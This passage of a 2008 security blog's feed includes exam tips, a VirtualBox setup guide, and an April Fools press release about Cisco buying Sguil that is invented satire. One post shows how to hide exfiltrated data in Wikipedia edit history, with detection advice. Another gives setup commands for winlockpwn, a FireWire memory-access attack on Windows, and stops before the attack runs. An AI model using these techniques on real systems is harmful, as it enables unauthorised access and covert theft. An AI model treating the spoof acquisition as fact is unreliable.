algorithm detects the dangerous behaviour or allows it, as some background unzipping processes do.&lt;br /&gt;&lt;br /&gt;So there it is, my tip of the moment. Nothing impressive, but kind of nifty. 
And maybe we will wake up some other bloggers :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-6196435236097212330?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/6196435236097212330/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=6196435236097212330' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/6196435236097212330'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/6196435236097212330'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/07/blog-wakeup-call-tip-of-moment-zip.html' title='(Blog wakeup call) Tip of the Moment: Zip Traversal'/><author><name>cyber_eagle</name><uri>http://www.blogger.com/profile/14871515833295269631</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='32' src='http://bp3.blogger.com/_DoxQChaTr8Y/R9mpFJoEq3I/AAAAAAAAAAM/JyXhQgb7JU0/S220/matt-aboutme.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-521914633546334788</id><published>2008-04-19T02:38:00.000-07:00</published><updated>2008-04-19T04:24:43.782-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SANS'/><category scheme='http://www.blogger.com/atom/ns#' term='GSSP-C'/><category scheme='http://www.blogger.com/atom/ns#' term='certification'/><title type='text'>Taking the GSSP-C Exam</title><content type='html'>On a sunny day in March, I strolled through the &lt;a href="http://en.wikipedia.org/wiki/Begijnhof"&gt;Begijnhof&lt;/a&gt; in Leuven, 
Belgium (pictures &lt;a href="http://www.cs.kuleuven.be/%7Emaarten/pics/begijnhofleuven/index.html"&gt;here&lt;/a&gt;). My destination was a nice medieval house where I would take the &lt;a href="http://www.giac.org/certifications/software/gssp-c.php"&gt;GSSP-C&lt;/a&gt; exam (GIAC Secure Software Programmer - C).&lt;br /&gt;&lt;br /&gt;This exam is not your usual SANS exam: it's a proctored paper exam, containing 100 multiple-choice questions, and has a six-hour time limit. Unlike other GIAC certifications, this exam is not offered online and is not open book. The GSSP certification exam is only offered at specific locations on a number of dates through the year. This time, SANS teamed up with &lt;a href="http://secappdev.org/"&gt;secappdev&lt;/a&gt; to organize this exam in Belgium (I believe it was the first time this exam was organized in Europe). The proctor was Pieter Danhieux (&lt;a href="http://www.giac.org/certifications/gse.php"&gt;GSE&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;You have to be fluent in &lt;a href="http://en.wikipedia.org/wiki/C_%28programming_language%29"&gt;C&lt;/a&gt; to attempt this exam (I believe I wrote my first C program in 1984), because a lot of the questions will be code listings where you have to identify errors. The SANS &lt;a href="http://www.sans.org/gssp07/C_Handbook.pdf"&gt;C-handbook&lt;/a&gt; has sample questions that give a good idea what to expect. And if you just learned to program in C, you might be able to answer many questions, but I highly doubt you'll manage to provide enough correct answers in the allotted time limit.&lt;br /&gt;&lt;br /&gt;Brush up your knowledge of the basic C I/O functions: what is their signature, how do they behave? 
Trust me, you'll need this during the exam (remember, this exam is not open book).&lt;br /&gt;&lt;br /&gt;Read a couple of the recommended books, like &lt;a href="http://www.amazon.com/Exploiting-Software-Break-Addison-Wesley-Security/dp/0201786958"&gt;Exploiting Software: How to Break Code&lt;/a&gt; and &lt;a href="http://www.microsoft.com/mspress/books/5957.aspx"&gt;Writing Secure Code, Second Edition&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Be prepared for some really hard puzzles. I remember one question where I would have overlooked the error in the C program. It's only because I knew the program was faulty that I persevered and found the f*ing bug!&lt;br /&gt;&lt;br /&gt;Another hurdle is the exam format. Tackling 100 questions in 6 hours and transcribing 100 answers correctly with a number 2 pencil on a form is not so trivial. I followed the same strategy I successfully applied during my &lt;a href="http://blog.didierstevens.com/2007/04/16/about-the-strategy-i-followed-during-my-cissp-exam/"&gt;CISSP&lt;/a&gt; exam. Here is my recipe:&lt;br /&gt;&lt;br /&gt;I read the first question. If I don’t understand the question, or if I don’t like the question, or if I even don’t feel like answering the question right now, I just move on to the next question. 
However, even if I skip a question, when I’m certain that one or more of the answers are not correct I cross them out (every time I say I write something down or make a mark, I do it on the question booklet, unless stated otherwise).&lt;br /&gt;&lt;p&gt; If I try to answer the question but I’m not sure of the right answer, I will cross out the incorrect answers and move on to the next question.&lt;br /&gt;If I answer a question I’m sure about, I put a circle around the number of the question and another one around the letter of the correct answer.&lt;/p&gt; &lt;p&gt;After tackling the last question, I just start the process again from the beginning, skipping the questions I already answered (remember, there’s a circle around the number of an answered question). I repeat this process several times; each cycle gives me more answers. After a couple of hours, I’ve answered about 80% of the questions and I decide to transcribe my answers to the form (I have to be careful to skip the unanswered questions on the form). I review each answered question and transcribe the correct answer to the form. At the same time, I compile a list of all unanswered questions.&lt;br /&gt;I decided to transcribe the answers after completing about 80% because:&lt;br /&gt;1) I want to take the time to correctly transcribe the answers; I don’t want to make mistakes by rushing the job at the end of the 6 hour period allowed for the exam&lt;br /&gt;2) I don’t want to start second-guessing my answers&lt;/p&gt; &lt;p&gt;After 30 minutes, I’ve transcribed all answered questions.&lt;/p&gt; &lt;p&gt;Now I focus on the list of remaining questions. I try to answer each question by eliminating all incorrect answers: what remains must be the correct answer. If more than one answer remains, I select one at random. I start guessing because I don’t want to stay until the end of the exam trying to find the correct answers; I feel confident because of all the other questions I answered. 
Since a wrong answer does not negatively impact your score, you’re better off answering all questions than leaving some unanswered. The main reason why I tackle the remaining questions like this is that I don't want to start second-guessing my answers to the questions I felt confident about. Trust me, if you spend too much time toiling over a question where you're clueless, you'll start to doubt everything.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Finally, I transcribe the remaining answers to the form. The list of remaining questions I compiled helps me to identify which answers remain to be transcribed.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;It's the first certification exam I really enjoyed. I had fun reviewing all that C code; it's a bit like discovering vulnerabilities.&lt;/p&gt;&lt;p&gt;Six weeks later, I got my detailed score report from SANS. Did I pass? I'll leave you, too, in suspense, for a couple of seconds...&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.giac.org/certified_professionals/listing/gssp-c.php"&gt;http://www.giac.org/certified_professionals/listing/gssp-c.php&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-521914633546334788?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/521914633546334788/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=521914633546334788' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/521914633546334788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/521914633546334788'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/04/taking-gssp-c-exam.html' title='Taking the GSSP-C Exam'/><author><name>Didier Stevens</name><uri>http://www.blogger.com/profile/17537511475658709281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-2211415481472702870</id><published>2008-04-11T02:11:00.000-07:00</published><updated>2008-04-11T02:55:58.660-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virtualbox tun/tap bridge backtrack'/><title type='text'>Running Backtrack in VirtualBox</title><content type='html'>Seeing as I've just spent the morning trying to get all this up and running, I thought I'd create an entry about how to get Backtrack running in VirtualBox.&lt;br /&gt;&lt;br /&gt;For those who haven't heard of it, &lt;a href="http://virtualbox.org/"&gt;VirtualBox&lt;/a&gt; is an open source equivalent to vmware workstation. It does full snapshotting (unlike vmware server) and seems to have a very active support community.&lt;br /&gt;&lt;br /&gt;The setup I wanted was for the virtual machine to have its own IP address and full network access. The default setup for VirtualBox is to have NAT based networking so I had to do a bit of work to get full "Host Interface" mode. Unlike vmware, VirtualBox doesn't do all the networking itself; you have to do the initial setup yourself. This is done by using tun/tap and bridging. The instructions here work on &lt;a href="http://www.archlinux.org/"&gt;Arch&lt;/a&gt; but should be generic enough for any distro. 
The install guide has detailed instructions for debian/ubuntu, redhat and suse.&lt;br /&gt;&lt;br /&gt;First you need to install uml_utilities and bridge-utils; in Arch:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;pacman -S uml_utilities bridge-utils&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You then create a bridge and add your main interface to it:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;brctl addbr br0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ifconfig eth0 0.0.0.0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;brctl addif br0 eth0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ifconfig br0 up&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The IP address normally assigned to eth0 now needs to be assigned to br0, so either bring up your dhcp client or hardcode the IP using ifconfig. If you are using ifconfig remember to set up your default route. Also remember to kill any dhcp clients working for eth0.&lt;br /&gt;&lt;br /&gt;Next is creating the tun/tap interface. First check if you have the tun module loaded:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;lsmod|grep tun&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;and if not load it:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;modprobe tun&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The virtual machine is going to get its own interface; this can be named whatever you want. I call mine vbox0. 
To create it:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;tunctl -t vbox0 -u robin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;this then needs adding to the bridge:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;brctl addif br0 vbox0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;and, the bit I missed for a while, bringing up:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;ifconfig vbox0 up&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You also need to check that the device (&lt;span style="font-family: courier new;"&gt;/dev/net/tun&lt;/span&gt;) is accessible by the user who is going to use it. I did this by creating a new vboxusers group, adding myself to it then making sure that the group could read and write from the device:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;groupadd vboxusers&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;usermod -a -G vboxusers robin&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;chgrp vboxusers /dev/net/tun&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;chmod g+rw /dev/net/tun&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You should now have a working virtual interface.&lt;br /&gt;&lt;br /&gt;VirtualBox has a fairly simple GUI for creating new machines so I won't talk through that in detail. Basically, click the create a new machine button, set the memory size and if you want to have a drive for the machine, set that up here as well.&lt;br /&gt;&lt;br /&gt;Once you've set up the machine it will appear in the left hand list of available machines. Right click on it and choose settings. Choose Network and change the "Attached to" option to "Host Interface". In the "Interface Name" section at the bottom enter vbox0 (or whatever you called it above).&lt;br /&gt;&lt;br /&gt;Next go to the "cd/dvd-rom" section and choose "mount cd/dvd drive" and specify where your backtrack CD is, either ISO or physical location. 
Click OK and you're done.&lt;br /&gt;&lt;br /&gt;Start the machine; it should boot as normal and, once up and running, should try to get an IP address through dhcp. If you haven't got dhcp you will need to set up the IP manually.&lt;br /&gt;&lt;br /&gt;All of this information is available in the VirtualBox manual but I found that some of the scripts it referred to didn't exist or didn't work quite as expected. I also prefer to set this kind of thing up by hand, at least the first few times, so that I really know what is going on; once I'm happy I'll look at scripting it.&lt;br /&gt;&lt;br /&gt;Any problems, questions or corrections, let me know.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-2211415481472702870?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/2211415481472702870/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=2211415481472702870' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/2211415481472702870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/2211415481472702870'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/04/running-backtrack-in-virtualbox.html' title='Running Backtrack in VirtualBox'/><author><name>Robin</name><uri>http://www.blogger.com/profile/12253688056868731954</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://bp0.blogger.com/_BvVXklVnDYA/R_82ie--a3I/AAAAAAAAAAM/HgqufWPq8Tg/S220/ninja.png'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-3390310812465252598</id><published>2008-04-01T06:27:00.000-07:00</published><updated>2008-04-01T06:35:51.220-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cisco'/><category scheme='http://www.blogger.com/atom/ns#' term='sguil'/><title type='text'>Cisco Acquires Sguil!!</title><content type='html'>In many of my past writings I have mentioned using &lt;a href="http://sguil.sf.net/"&gt;Sguil&lt;/a&gt; on my personal blog and have been an avid user of the solution. On that front, I would like to extend my congratulations to the core members of the team for their great success! It will be exciting to see it running on IOS!&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;Cisco Announces Agreement to Acquire Sguil™ Open Source Security Monitoring Project&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Acquisition Furthers Cisco’s Vision for Integrated Security Products&lt;br /&gt;&lt;br /&gt;SAN JOSE, Calif., and LONGMONT, Colo., April 1st, 2008 – Cisco and the Sguil™ project today announced an agreement for Cisco to acquire the Sguil™ project, a leading Open Source network security solution. With hundreds of installations world-wide, Sguil™ is the de facto reference implementation for the Network Security Monitoring (NSM) model. Sguil™-based NSM will enable Cisco’s customer base to more efficiently collect and analyze security-related information as it traverses their enterprise networks. 
This acquisition will help Cisco to cement its reputation as a leader in the Open Source movement while at the same time furthering its long-held vision of integrating security into the network infrastructure.&lt;br /&gt;&lt;br /&gt;Under terms of the transaction, Cisco has acquired the Sguil™ project and related trademarks, as well as the copyrights held by the five principal members of the Sguil™ team, including project founder Robert "Bamm" Visscher. Cisco will assume control of the open source Sguil™ project including the Sguil.net domain, web site and web site content and the Sguil™ Sourceforge project page. In addition, the Sguil™ team will remain dedicated to the project as Cisco employees, continuing their management of the project on a day-to-day basis.&lt;br /&gt;&lt;br /&gt;To date, Sguil™ has been developed primarily in the Tcl scripting language, support for which is already present inside many of Cisco’s routers and switches. The new product, to be known as “Cisco Embedded Monitoring Solution (CEMS)”, will be made available first in Cisco’s carrier-grade products in 3Q08, with support being phased into the rest of the Cisco product line by 4Q09. Linksys-branded devices will follow thereafter, though the exact deployment schedule has yet to be announced.&lt;br /&gt;&lt;br /&gt;“We’re extremely pleased to announce this deal,” said Cisco’s Chief Security Product Manager Cletus F. Simmons. “For some time, our customers have told us that our existing security monitoring products did not extend far enough into their network infrastructure layer. Not only was it sometimes difficult to intercept and monitor the traffic, but there were often political problems at the customer site with deploying our Intrusion Detection Systems, as management had heard several years ago that they were ‘dead’. 
Now, with Sguil™ integrated into all their network devices, they’ll have no choice!”&lt;br /&gt;&lt;br /&gt;Although the financial details of the agreement have not been announced, Sguil™ developer Robert Visscher will become the new VP of Cisco Rapid Analysis Products for Security. “This deal means a lot to the Sguil™ project and to me personally,” Visscher explains. “Previously, we had to be content with simply being the best technical solution to enable intrusion analysts to collect and analyze large amounts of data in an extraordinarily efficient manner. But now, we’ll have the additional advantage of the world’s largest manufacturer of networking gear shoving it down their customers’ throats! We will no longer have to concern ourselves with mere technical excellence. Instead, I can worry more about which tropical island to visit next, and which flavor daiquiri to order. You know, the important things.”&lt;br /&gt;&lt;br /&gt;About Cisco Systems&lt;br /&gt;&lt;br /&gt;Cisco, (NASDAQ: CSCO), is the worldwide leader in networking that transforms how people connect, communicate and collaborate. Information about Cisco can be found at http://www.cisco.com. For ongoing news, please go to http://newsroom.cisco.com.&lt;br /&gt;&lt;br /&gt;About Sguil™&lt;br /&gt;&lt;br /&gt;Sguil™ is the leading Network Security Monitoring (NSM) framework. It is built for network security analysts by network security analysts. Sguil’s main component is an intuitive GUI that provides access to a wide variety of security related information, including real-time IDS alerts, network session database and full packet captures. Sguil™ was written by Robert “Bamm” Visscher, who was apparently too cheap to buy a book on Java or C.&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;Again, congrats to the team... 
if you get a chance, please stop in at #snort-gui on freenode and say hi / congratulate the team.&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;&lt;a href="http://global-security.blogspot.com"&gt;enhanced&lt;/a&gt;&lt;i&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-3390310812465252598?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/3390310812465252598/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=3390310812465252598' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/3390310812465252598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/3390310812465252598'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/04/cisco-acquires-sguil.html' title='Cisco Acquires Sguil!!'/><author><name>JJC</name><uri>http://www.blogger.com/profile/08102466843919236000</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='18' height='32' src='http://www.redsphereglobal.com/Images/tall_london_bulkhead_brickwall.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-8028744312879396963</id><published>2008-03-31T07:07:00.000-07:00</published><updated>2008-03-31T08:08:14.183-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forensics'/><title type='text'>&lt;!-- Hiding Inside Wikipedia --&gt;</title><content type='html'>It seems that each time I attend &lt;a href="http://www.blackhat.com/"&gt;Black 
Hat&lt;/a&gt;, I get some &lt;a href="http://blog.didierstevens.com/2007/04/30/hiding-inside-a-rainbow/"&gt;new steganography idea&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;It's easy to hide data inside the Wikipedia pages. But before I explain how, understand that the general principle of what I will explain applies to most sites where users can edit content. They can all be used as a &lt;a href="http://en.wikipedia.org/wiki/Covert_channel"&gt;covert channel&lt;/a&gt;, but Wikipedia has become so common that it would have passed under my radar when performing a forensic investigation. But not anymore.&lt;br /&gt;&lt;br /&gt;You can use the &lt;a href="http://en.wikipedia.org/wiki/Wikipedia:Sandbox"&gt;Wikipedia Sandbox&lt;/a&gt; to experiment while avoiding the wrath of the Wiki gods.&lt;br /&gt;&lt;br /&gt;Select the &lt;b&gt;edit this page&lt;/b&gt; tab to start editing the article:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0004.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0004.png" /&gt;&lt;br /&gt;&lt;br /&gt;Prepare the data you want to store on Wikipedia by converting it to a &lt;a href="http://en.wikipedia.org/wiki/Base64"&gt;base64&lt;/a&gt; representation (you can ZIP and/or encrypt it before converting it to base64). Insert the base64 data as a hidden comment inside the page:&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0005.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0005.png" /&gt;&lt;br /&gt;&lt;br /&gt;Save your changes first, and then undo your changes via the&lt;b&gt; history&lt;/b&gt; tab:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0006b.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0006b.png" /&gt;&lt;br /&gt;&lt;br /&gt;That's it! 
From now on, you can retrieve your data by comparing versions:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0008.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0008.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0009.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0009.png" /&gt;&lt;br /&gt;&lt;br /&gt;So how can you detect and prevent this? Disclosure: my analysis is based on observations of the HTTP traffic generated by a browser connecting to Wikipedia, and not by analyzing the &lt;a href="http://en.wikipedia.org/wiki/MediaWiki"&gt;MediaWiki&lt;/a&gt; software.&lt;br /&gt;&lt;br /&gt;Normal Wikipedia requests (browsing the articles) are GET http requests to the wikipedia.org server. Editing a page is done with a POST http request:&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0010.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0010.png" /&gt;&lt;br /&gt;&lt;br /&gt;So to detect a user updating a Wikipedia page, look for POST requests to Wikipedia. But there are exceptions to this rule. First, previews also use a POST request:&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0011.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0011.png" /&gt;&lt;br /&gt;&lt;br /&gt;You'll have to look inside the posted form data to differentiate a save from a preview:&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0012.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0012.png" /&gt;&lt;br /&gt;&lt;br /&gt;Another exception is a user login:&lt;br /&gt;&lt;br /&gt;&lt;img alt="wikipedia-0013.png" src="http://didierstevens.wordpress.com/files/2008/03/wikipedia-0013.png" /&gt;&lt;br /&gt;&lt;br /&gt;To differentiate these, use the action parameter. 
It's &lt;em&gt;submit&lt;/em&gt; for article updates and &lt;em&gt;submitlogin&lt;/em&gt; for a user login.&lt;br /&gt;&lt;br /&gt;You can use these criteria (POST request, form data, action parameter) to block edits to the Wikipedia site via a filtering proxy. Of course, this detects and blocks all updates, not only updates to exfiltrate data.&lt;br /&gt;&lt;br /&gt;Didier Stevens&lt;br /&gt;&lt;a href="https://didierstevens.com/"&gt;https://DidierStevens.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-8028744312879396963?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/8028744312879396963/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=8028744312879396963' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/8028744312879396963'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/8028744312879396963'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/03/hiding-inside-wikipedia.html' title='&amp;lt;!-- Hiding Inside Wikipedia --&amp;gt;'/><author><name>Didier Stevens</name><uri>http://www.blogger.com/profile/17537511475658709281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-9135027237287778286</id><published>2008-03-26T07:49:00.000-07:00</published><updated>2008-03-26T08:05:31.606-07:00</updated><title type='text'>How To: 
winlockpwn</title><content type='html'>&lt;span&gt;winlockpwn&lt;/span&gt; is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire's direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy, right? I installed &lt;span&gt;winlockpwn&lt;/span&gt; on Ubuntu 7.10 and a fully patched Windows XP SP2 box.  The first step is to download the required libraries:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;sudo aptitude install libdc1394-13 libraw1394-dev swig python&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz&lt;br /&gt;tar -zxvf Python-2.3.6.tgz&lt;br /&gt;cd Python-2.3.6&lt;br /&gt;./configure&lt;br /&gt;make&lt;br /&gt;sudo make install&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;The next step is to modify libraw1394:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;sudo vim /usr/include/libraw1394/raw1394.h&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;At this point go ahead and search for “&lt;span&gt;__attribute__((deprecated));&lt;/span&gt;” in the file raw1394.h and comment out every line that contains it. Hint: don't forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file.  The next step is to get the pythonraw1394 library. 
It contains the python bindings for &lt;span&gt;libraw1394&lt;/span&gt;, &lt;span&gt;romtool&lt;/span&gt;, and &lt;span&gt;businfo&lt;/span&gt; from Adam’s site.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;And of course, we need to untar it:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;tar -zxvf pythonraw1394-1.0.tar.gz&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Now we need to go into the untarred directory and download the actual &lt;span&gt;winlockpwn&lt;/span&gt; script:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;cd pythonraw1394&lt;br /&gt;wget http://www.storm.net.nz/static/files/winlockpwn&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;The winlockpwn script needs to be in the pythonraw1394 directory or it won't work without modifying the code. Also, we need to make it executable:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;chmod +x winlockpwn&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3's include directory:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;sudo vim Makefile&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. 
Again, save and quit, and compile it with the following command:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;sudo make&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;The raw1394 module also needs to be loaded and the permissions changed on the raw1394 devices:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;sudo modprobe raw1394&lt;br /&gt;sudo chmod 666 /dev/raw1394&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Now we need to plug into the Windows machine and then edit &lt;span&gt;romtool&lt;/span&gt; to reflect the location of python:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;sudo vim romtool&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Change &lt;span&gt;#!/usr/bin/python&lt;/span&gt; to &lt;span&gt;#!/usr/local/bin/python&lt;/span&gt; on the first line of the file.&lt;br /&gt;Repeat the same step for the &lt;span&gt;winlockpwn&lt;/span&gt; script as well.&lt;br /&gt;Then load the iPod image onto the firewire port:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;./romtool -s 0 ipod.csr&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Loading the iPod image onto the firewire port basically fools Windows into thinking your Linux box is an iPod.&lt;br /&gt;Now we can run &lt;span&gt;businfo&lt;/span&gt; to make sure the iPod image is loaded and to see what port number it is on, as well as to make sure you can see the computer on the other end. Mine showed the iPod image loaded onto port number 0 and my Windows box on node number 1.&lt;br /&gt;Now, the fun part! 
